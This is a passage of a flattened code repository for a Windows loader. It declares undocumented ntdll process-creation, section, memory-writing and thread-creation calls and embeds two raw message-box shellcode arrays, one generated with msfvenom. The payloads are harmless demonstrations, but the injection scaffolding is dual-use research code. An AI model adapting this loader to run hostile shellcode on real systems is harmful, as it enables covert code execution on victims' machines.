POBJECT_ATTRIBUTES, 171 | PLARGE_INTEGER, 172 | ULONG, 173 | ULONG, 174 | HANDLE 175 | )) proc; 176 | 177 | return true; 178 | } 179 | 180 | -------------------------------------------------------------------------------- /basic_ldr/ntdll_detached.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "ntddk.h" 5 | #include "ntdll_types.h" 6 | 7 | #define ntdll_NtCurrentProcess() ((HANDLE) -1) 8 | #define ntdll_NtCurrentThread() ((HANDLE) -2) 9 | 10 | //Functions: 11 | extern NTSTATUS (NTAPI *ntdll_NtCreateProcessEx) 12 | ( 13 | OUT PHANDLE ProcessHandle, 14 | IN ACCESS_MASK DesiredAccess, 15 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 16 | IN HANDLE ParentProcess, 17 | IN ULONG Flags, 18 | IN HANDLE SectionHandle OPTIONAL, 19 | IN HANDLE DebugPort OPTIONAL, 20 | IN HANDLE ExceptionPort OPTIONAL, 21 | IN BOOLEAN InJob 22 | ); 23 | 24 | extern NTSTATUS (NTAPI *ntdll_RtlCreateProcessParametersEx)( 25 | _Out_ PRTL_USER_PROCESS_PARAMETERS *pProcessParameters, 26 | _In_ PUNICODE_STRING ImagePathName, 27 | _In_opt_ PUNICODE_STRING DllPath, 28 | _In_opt_ PUNICODE_STRING CurrentDirectory, 29 | _In_opt_ PUNICODE_STRING CommandLine, 30 | _In_opt_ PVOID Environment, 31 | _In_opt_ PUNICODE_STRING WindowTitle, 32 | _In_opt_ PUNICODE_STRING DesktopInfo, 33 | _In_opt_ PUNICODE_STRING ShellInfo, 34 | _In_opt_ PUNICODE_STRING RuntimeData, 35 | _In_ ULONG Flags // pass RTL_USER_PROC_PARAMS_NORMALIZED to keep parameters normalized 36 | ); 37 | 38 | extern NTSTATUS (NTAPI *ntdll_NtCreateThreadEx) ( 39 | OUT PHANDLE ThreadHandle, 40 | IN ACCESS_MASK DesiredAccess, 41 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 42 | IN HANDLE ProcessHandle, 43 | IN LPTHREAD_START_ROUTINE StartRoutine, 44 | IN PVOID Argument OPTIONAL, 45 | IN ULONG CreateFlags, 46 | IN ULONG_PTR ZeroBits, 47 | IN SIZE_T StackSize OPTIONAL, 48 | IN SIZE_T MaximumStackSize OPTIONAL, 49 | IN PVOID AttributeList OPTIONAL 50 | ); 51 | 52 | extern NTSTATUS (NTAPI *ntdll_NtAllocateVirtualMemory)( 53 | _In_ HANDLE ProcessHandle, 54 | _Inout_ PVOID *BaseAddress, 55 | _In_ ULONG_PTR ZeroBits, 56 | _Inout_ PSIZE_T RegionSize, 57 | _In_ ULONG AllocationType, 58 | _In_ ULONG Protect 59 | ); 60 | 61 | extern NTSTATUS (NTAPI * ntdll_NtWriteVirtualMemory)( 62 | IN HANDLE ProcessHandle, 63 | IN PVOID BaseAddress, 64 | IN PVOID Buffer, 65 | IN ULONG NumberOfBytesToWrite, 66 | OUT PULONG NumberOfBytesWritten OPTIONAL 67 | ); 68 | 69 | extern NTSTATUS (NTAPI *ntdll_NtCreateSection) ( 70 | OUT PHANDLE SectionHandle, 71 | IN ACCESS_MASK DesiredAccess, 72 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 73 | IN PLARGE_INTEGER MaximumSize OPTIONAL, 74 | IN ULONG SectionPageProtection, 75 | IN ULONG AllocationAttributes, 76 | IN HANDLE FileHandle OPTIONAL 77 | ); 78 | 79 | // Load NTDLL by PEconv: 80 | HMODULE load_ntdll(size_t &v_size); 81 | 82 | // Initialize functions by PEconv 83 | bool init_ntdll_func(HMODULE ntdll_hndl); 84 | -------------------------------------------------------------------------------- /basic_ldr/ntdll_types.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | /* 3 | based on: pstype.h by Alex Ionescu 4 | */ 5 | // 6 | // Flags for NtCreateProcessEx 7 | // 8 | #define PROCESS_CREATE_FLAGS_BREAKAWAY 0x00000001 9 | #define PROCESS_CREATE_FLAGS_NO_DEBUG_INHERIT 0x00000002 10 | #define PROCESS_CREATE_FLAGS_INHERIT_HANDLES 0x00000004 11 | #define PROCESS_CREATE_FLAGS_OVERRIDE_ADDRESS_SPACE 0x00000008 12 | #define PROCESS_CREATE_FLAGS_LARGE_PAGES 0x00000010 13 | 14 | // 15 | // Process priority classes 16 | // 17 | #define PROCESS_PRIORITY_CLASS_INVALID 0 18 | #define PROCESS_PRIORITY_CLASS_IDLE 1 19 | #define PROCESS_PRIORITY_CLASS_NORMAL 2 20 | #define PROCESS_PRIORITY_CLASS_HIGH 3 21 | #define PROCESS_PRIORITY_CLASS_REALTIME 4 22 | #define PROCESS_PRIORITY_CLASS_BELOW_NORMAL 5 23 | #define PROCESS_PRIORITY_CLASS_ABOVE_NORMAL 6 24 | 25 | // 26 | // NtCreateProcessEx flags 27 | // 28 | #define PS_REQUEST_BREAKAWAY 1 29 | #define PS_NO_DEBUG_INHERIT 2 30 | #define PS_INHERIT_HANDLES 4 31 | #define PS_LARGE_PAGES 8 32 | #define PS_ALL_FLAGS (PS_REQUEST_BREAKAWAY | \ 33 | PS_NO_DEBUG_INHERIT | \ 34 | PS_INHERIT_HANDLES | \ 35 | PS_LARGE_PAGES) 36 | 37 | // 38 | // Process base priorities 39 | // 40 | #define PROCESS_PRIORITY_IDLE 3 41 | #define PROCESS_PRIORITY_NORMAL 8 42 | #define PROCESS_PRIORITY_NORMAL_FOREGROUND 9 43 | 44 | // 45 | // Process memory priorities 46 | // 47 | #define MEMORY_PRIORITY_BACKGROUND 0 48 | #define MEMORY_PRIORITY_UNKNOWN 1 49 | #define MEMORY_PRIORITY_FOREGROUND 2 50 | 51 | /* 52 | based on ProcessHacker source: 53 | */ 54 | 55 | #define RTL_USER_PROC_PARAMS_NORMALIZED 0x00000001 56 | #define RTL_USER_PROC_PROFILE_USER 0x00000002 57 | #define RTL_USER_PROC_PROFILE_KERNEL 0x00000004 58 | #define RTL_USER_PROC_PROFILE_SERVER 0x00000008 59 | #define RTL_USER_PROC_RESERVE_1MB 0x00000020 60 | #define RTL_USER_PROC_RESERVE_16MB 0x00000040 61 | #define RTL_USER_PROC_CASE_SENSITIVE 0x00000080 62 | #define RTL_USER_PROC_DISABLE_HEAP_DECOMMIT 0x00000100 63 | #define RTL_USER_PROC_DLL_REDIRECTION_LOCAL 0x00001000 64 | #define RTL_USER_PROC_APP_MANIFEST_PRESENT 0x00002000 65 | #define RTL_USER_PROC_IMAGE_KEY_MISSING 0x00004000 66 | #define RTL_USER_PROC_OPTIN_PROCESS 0x00020000 67 | -------------------------------------------------------------------------------- /basic_ldr/shellcodes.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | /* 4 | msfvenom -a x86 --platform Windows -p windows/messagebox TEXT="Hello from the shellcode!" TITLE="Shellcode 32bit" -f c 5 | */ 6 | unsigned char messageBox32bit_sc[] = 7 | "\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64\x8b" 8 | "\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b" 9 | "\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24" 10 | "\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a" 11 | "\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0" 12 | "\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c" 13 | "\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a" 14 | "\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2" 15 | "\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f" 16 | "\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52" 17 | "\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33" 18 | "\x32\x2e\x64\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89" 19 | "\xe6\x56\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c" 20 | "\x24\x52\xe8\x5f\xff\xff\xff\x68\x62\x69\x74\x58\x68\x65\x20" 21 | "\x33\x32\x68\x6c\x63\x6f\x64\x68\x53\x68\x65\x6c\x31\xdb\x88" 22 | "\x5c\x24\x0f\x89\xe3\x68\x21\x58\x20\x20\x68\x63\x6f\x64\x65" 23 | "\x68\x68\x65\x6c\x6c\x68\x68\x65\x20\x73\x68\x6f\x6d\x20\x74" 24 | "\x68\x6f\x20\x66\x72\x68\x48\x65\x6c\x6c\x31\xc9\x88\x4c\x24" 25 | "\x19\x89\xe1\x31\xd2\x52\x53\x51\x52\xff\xd0\x31\xc0\x50\xff" 26 | "\x55\x08"; 27 | 28 | /* 29 | from: https://www.tophertimzen.com/blog/windowsx64Shellcode/ 30 | warning: this shellcode crashes on Windows 8 and above 31 | will be replaced by some other soon... 32 | */ 33 | unsigned char messageBox64bit_sc[] = { 34 | 0x48, 0x83, 0xec, 0x28, 0x48, 0x83, 0xe4, 0xf0, 0x65, 0x4c, 0x8b, 0x24, 35 | 0x25, 0x60, 0x00, 0x00, 0x00, 0x4d, 0x8b, 0x64, 0x24, 0x18, 0x4d, 0x8b, 36 | 0x64, 0x24, 0x20, 0x4d, 0x8b, 0x24, 0x24, 0x4d, 0x8b, 0x7c, 0x24, 0x20, 37 | 0x4d, 0x8b, 0x24, 0x24, 0x4d, 0x8b, 0x64, 0x24, 0x20, 0xba, 0x8e, 0x4e, 38 | 0x0e, 0xec, 0x4c, 0x89, 0xe1, 0xe8, 0x68, 0x00, 0x00, 0x00, 0xeb, 0x34, 39 | 0x59, 0xff, 0xd0, 0xba, 0xa8, 0xa2, 0x4d, 0xbc, 0x48, 0x89, 0xc1, 0xe8, 40 | 0x56, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc3, 0x4d, 0x31, 0xc9, 0xeb, 0x2c, 41 | 0x41, 0x58, 0xeb, 0x3a, 0x5a, 0x48, 0x31, 0xc9, 0xff, 0xd3, 0xba, 0x70, 42 | 0xcd, 0x3f, 0x2d, 0x4c, 0x89, 0xf9, 0xe8, 0x37, 0x00, 0x00, 0x00, 0x48, 43 | 0x31, 0xc9, 0xff, 0xd0, 0xe8, 0xc7, 0xff, 0xff, 0xff, 0x75, 0x73, 0x65, 44 | 0x72, 0x33, 0x32, 0x2e, 0x64, 0x6c, 0x6c, 0x00, 0xe8, 0xcf, 0xff, 0xff, 45 | 0xff, 0x54, 0x68, 0x69, 0x73, 0x20, 0x69, 0x73, 0x20, 0x66, 0x75, 0x6e, 46 | 0x21, 0x00, 0xe8, 0xc1, 0xff, 0xff, 0xff, 0x30, 0x78, 0x64, 0x65, 0x61, 47 | 0x64, 0x62, 0x65, 0x65, 0x66, 0x00, 0x49, 0x89, 0xcd, 0x67, 0x41, 0x8b, 48 | 0x45, 0x3c, 0x67, 0x45, 0x8b, 0xb4, 0x05, 0x88, 0x00, 0x00, 0x00, 0x45, 49 | 0x01, 0xee, 0x67, 0x45, 0x8b, 0x56, 0x18, 0x67, 0x41, 0x8b, 0x5e, 0x20, 50 | 0x44, 0x01, 0xeb, 0x67, 0xe3, 0x3f, 0x41, 0xff, 0xca, 0x67, 0x42, 0x8b, 51 | 0x34, 0x93, 0x44, 0x01, 0xee, 0x31, 0xff, 0x31, 0xc0, 0xfc, 0xac, 0x84, 52 | 0xc0, 0x74, 0x07, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xeb, 0xf4, 0x39, 0xd7, 53 | 0x75, 0xdd, 0x67, 0x41, 0x8b, 0x5e, 0x24, 0x44, 0x01, 0xeb, 0x31, 0xc9, 54 | 0x66, 0x67, 0x42, 0x8b, 0x0c, 0x53, 0x67, 0x41, 0x8b, 0x5e, 0x1c, 0x44, 55 | 0x01, 0xeb, 0x67, 0x8b, 0x04, 0x8b, 0x44, 0x01, 0xe8, 0xc3 56 | }; 57 | --------------------------------------------------------------------------------